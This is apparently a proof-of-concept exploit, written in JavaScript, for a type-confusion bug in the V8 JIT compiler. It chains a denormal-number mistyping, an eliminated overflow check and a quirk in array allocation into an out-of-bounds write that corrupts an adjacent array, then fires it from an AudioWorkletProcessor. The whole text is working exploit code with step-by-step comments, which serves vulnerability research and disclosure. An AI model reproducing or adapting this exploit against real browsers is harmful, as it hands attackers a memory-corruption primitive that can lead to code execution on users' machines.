// Typical exploit utility code.
let ab = new ArrayBuffer(8);
let f64 = new Float64Array(ab);
let i64 = new BigUint64Array(ab);
function itof(i) {
  i64[0] = i;
  print(f64[0]);
  return f64[0];
}
function ftoi(f) {
  f64[0] = f;
  return i64[0];
}

function poc(x) {
  // Embed the denormal number into an object literal so that it only becomes a
  // constant after escape analysis turns the heap allocation into a stack
  // allocation. See https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/
  let obj = {denormal: 5E-324};

  // Here we need a side effect to prevent LoadElimination from converting the
  // denormal into a constant prior to escape analysis. Any non-inlineable
  // builtin should work, or a function parameter.
  new Float64Array();

  // Now we need to convert the initial mistyping between the denormal and zero
  // into an integer range mismatch. For that, we go via Object.is to generate
  // a bool mismatch, then build on that to construct a range mismatch. See
  // also https://project-zero.issues.chromium.org/issues/42450781.
  //
  // If we directly use Object.is(o.denormal, 0) here, we'll get a mismatch
  // during the simplified lowering phase (compiler believes it must be false,
  // at runtime it is true). However, later on Turboshaft will constant fold
  // the Float64SameValue operation into just <false>, thereby "fixing" the
  // type confusion. To avoid that, we perform some operations first for which
  // Turbofan's typer can still determine that they will result in the denormal
  // constant, but which Turboshaft cannot constant fold. A simple Math.min
  // with a known-positive number seems to work for that purpose.
  let positive = (x & 1) + 1;     // Range(1, 2)
  let denormal = Math.min(obj.denormal, positive);
  let b = Object.is(denormal, 0);
  // Expected: <false>, actual: <true>

  // We now have a mistyping during simplified lowering. However, a lot of the
  // interesting stuff seems to happen earlier on, after the initial typing
  // phase. As such, now we "go back in time" and cause a mistyping already
  // during the initial typing phase. For that, we build a SpeculativeNumberAdd
  // operation that will either result in a positive number or a deopt if an
  // overflow happens. Then, during simplified lowering we trick the compiler
  // into believing that the addition cannot overflow and therefore to omit the
  // overflow check. In reality, the addition overflows and we now have a
  // mistyping already during the first typing phase \o/

  let n = b | 0;
  // Initial typing:      expected: Range(0, 1)        actual: 1
  // Simplified lowering: expected: 0                  actual: 1
  n *= 0xffffffff;
  // Initial typing:      expected: Range(0, INT_MAX)  actual: INT_MAX
  // Simplified lowering: expected: 0                  actual: INT_MAX
  let o = n + 1;
  // Initial typing:      expected: Range(1, INT_MAX)  actual: 0
  // Simplified lowering: expected: Range(1, 1)        actual: 0

  // Finally we abuse a quirk in the way JSArray allocations are lowered. What
  // happens here is that we trick the compiler into believing that the index
  // will be a constant value (or bail out during a CheckBounds). It will then
  // set the .length of the JSarray to this constant but still use the runtime
  // value (which will actually be zero) as input the MaybeGrowFastElements. As
  // such, we end up with a JSArray of length X backed by a FixedArray of a
  // smaller size. This seems to be vaguely similar to past techniques in that
  // area: https://project-zero.issues.chromium.org/issues/42451148 or
  // https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html.
  // The undefined here is needed so that we end up with a union type after the
  // multiplication. Otherwise, the compiler will constant fold the values.
  let o_ = (Math.random() <= 1) ? o : undefined;
  let i = Math.sign(o_) * 64;
  // Expected: NaN | Range(64, 64), actual: 0
  let first = [1];
  first[i] = 2;

  // Lazy PoC: just allocate two arrays right next to each other. Then we can
  // for example corrupt the second array's backing buffer pointer by writing
  // OOB into the first. We don't use float64 arrays as the denormalization
  // mode can also affect those.
  let second = [1,2,3];
  return {first, second};
}

// Force JIT optimization.
for (let i = 0; i < 100000; i++) {
  poc(0);
}

class MemoryCorruptionProcessor extends AudioWorkletProcessor {
  process(inputs, outputs, parameters) {
    let {first, second} = poc(0);
    // Second array should come right after the first, so at offset 4, there will
    // be the second array's length.
    if (first[4] != second.length) throw "failed :(";
    first[3] = 0x41414141 >> 1;
    second[0] = 42;

    return true;
  }
}

registerProcessor("memory-corruption-processor", MemoryCorruptionProcessor);
